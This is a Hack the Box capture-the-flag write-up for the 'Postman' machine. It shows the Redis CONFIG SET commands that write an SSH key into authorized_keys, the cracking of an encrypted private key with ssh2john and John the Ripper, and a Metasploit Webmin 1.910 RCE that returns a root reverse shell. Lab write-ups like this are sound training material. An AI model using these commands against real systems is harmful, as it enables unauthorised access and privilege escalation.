Hack the box: Postman#

Postman was a easy difficulty machine on Hack the box. Here’s my take on solving the machine

Postman

Postman

Tl;dr: Unauthenticated, public Redis instance allows authorized_keys overwrite and thus SSH access. Using SSH it is possible to download another key which after cracking reveals user Matt’s password. Matt’s credentials give access to a vulnerable Webmin instance that can be exploited for a privileged reverse shell.

Recon#

Nmap scan reveals a couple of services. The most unusual seems to be Redis store.

nmap postman.htb -sS -sV -n -p-
--snip--
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Low privlege shell#

There is a dedicated client for Redis services. It can be installed by using command:

# apt-get install redis-tools

After that it’s possible to connect to the service without authentication and read configuration:

redis-cli -h postman.htb
postman.htb:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"

Assuming that /var/lib/redis is redis user’s home folder it could be possible to add an authorized ssh key. First it is needed to configure redis to overwrite authorized_keys:

postman.htb:6379> config set dir /var/lib/redis/.ssh
OK
postman.htb:6379> config set dbfilename authorized_keys
OK

Then write public key to the database:

# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > redis-cli -h postman.htb -x set ssh_key

Finally, save the changes:

# redis-cli -h postman.htb
postman.htb:6379> save
OK

Now it’s possible to login to SSH as redis:

# ssh redis@postman.htb -i id_rsa -c aes256-ctr
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

Password reversing#

In the .bash_history file there is an information of an interesting file and username:

redis@Postman:~$ cat .bash_history 
-- snip --
su Matt
exit
cat id_rsa.bak
-- snip --

It can be found int the /opt directory:

redis@Postman:~$ find / -name "id_rsa.bak" 2>/dev/null
/opt/id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

The file’s password can be cracked using John the Ripper. First by prepring with ssh2john:

# ssh2john.exe D:\key.txt
-- snip --
key.txt:$ssh2$2d2d2d2d2d424547494e205253412050524956415445204b45592d2d2d2d2d0d0a50726f632d547970653a20342c454e435259505445440d0a44454b2d496e666f3a-- snip --

Result of above operation can be fed to actual password cracking:

# cat key2.txt
key:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd9-- snip --
# john.exe key2.txt --wordlist=rockyou.txt
-- snip --
computer2008     (key)

Root shell#

Using already known user and password (Matt:computer2008) it is possible to login to Webmin service. After logging in it reveals running version:

Webmin version

Webmin version

There’s an public RCE exploit for that version:

# searchsploit "webmin 1.910"

It is available in Metasploit:

# msfconsole -q
msf5 > use exploit/linux/http/webmin_packageup_rce
-- snip --
msf5 exploit(linux/http/webmin_packageup_rce) > info
-- snip ---
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   computer2008     yes       Webmin Password
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      10000            yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path for Webmin application
  USERNAME   Matt             yes       Webmin Username
  VHOST                       no        HTTP server virtual host

Running above exploit should yield a privleged shell:

msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.70:443 
[+] Session cookie: 1a2775d4c336c5d232853acf8fbd849d
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.70:443 -> 10.10.10.160:38706) at 2019-11-14 17:29:39 +0100
id

uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a25...
cat /home/Matt/user.txt
517...